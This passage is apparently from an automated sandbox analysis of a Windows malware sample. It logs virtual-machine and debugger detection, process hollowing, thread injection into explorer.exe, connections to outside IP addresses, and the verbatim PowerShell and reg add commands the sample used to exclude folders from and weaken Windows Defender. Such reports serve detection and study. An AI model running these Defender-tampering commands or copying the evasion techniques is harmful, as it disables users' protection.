Source: svchost.exe, 0000000B.00000002.2695550884.000001E0D124B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C6000c298128b8c02a71a2474aeb5f3dc\|Virtual disk \|VMware
Source: svchost.exe, 0000001C.00000002.2523419061.0000017993A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &@\??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000024.00000000.1419179675.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000024.00000000.1419179675.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: svchost.exe, 0000001C.00000003.1311533226.0000017993A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001C.00000002.2523419061.0000017993A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2721253426.000001E0D1264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000001C.00000003.1311218476.0000017993A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2721253426.000001E0D127F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000D.00000002.2762397674.000001B899B32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?VMware-4288 1!cc 59 1`
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000024.00000000.1419179675.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6000c298128b8c02a71a2474aeb5f3dc\|Virtual disk \|VMware
Source: AddInProcess32.exe, 00000005.00000002.2528201229.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.2537509496.00000238A0831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140AAD000.00000080.00000001.01000000.0000000E.sdmp	Binary or memory string: <$hGfSuA_A
Source: svchost.exe, 0000000D.00000003.1410135146.000001B899B36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
Source: svchost.exe, 0000000B.00000002.2686253357.000001E0D122B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000024.00000000.1337259714.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 0000001C.00000002.2523240829.0000017993A02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000034.00000002.2732590110.000001F4D8694000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000024.00000000.1419179675.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: svchost.exe, 00000034.00000002.2705850563.000001F4D862B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: svchost.exe, 0000000B.00000002.2686253357.000001E0D123A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000D.00000002.2695447346.000001B899287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000D.00000003.1410168158.000001B899B47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

System information queried: ModuleInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks if the current process is being debugged

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

Code function: 8_2_00403406 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,

8_2_00403406

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

Code function: 18_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_00418320

Contains functionality to read the PEB

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E10D90 mov eax, dword ptr fs:[00000030h]	8_2_02E10D90
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_02E1092B mov eax, dword ptr fs:[00000030h]	8_2_02E1092B
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_03021E8F push dword ptr fs:[00000030h]	8_2_03021E8F

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35755C0 RtlAddVectoredExceptionHandler,	0_2_00007FF7E35755C0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35D9808 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7E35D9808
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0041584A SetUnhandledExceptionFilter,	18_2_0041584A
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0041585C SetUnhandledExceptionFilter,	18_2_0041585C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: FFE8.exe.36.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80
Source: C:\Windows\explorer.exe	Network Connect: 66.85.156.89 80

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

Thread created: C:\Windows\explorer.exe EIP: 89419E0

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140D79DBC
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140737CF6
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtSetInformationThread: Indirect: 0x14074EFD4
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQuerySystemInformation: Indirect: 0x140D20A0E
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140D79F0B
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQueryInformationProcess: Indirect: 0x140737BBA
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtSetInformationThread: Indirect: 0x140D9A2AB
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	NtQuerySystemInformation: Indirect: 0x1406D842B

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000	Jump to behavior
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 674008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
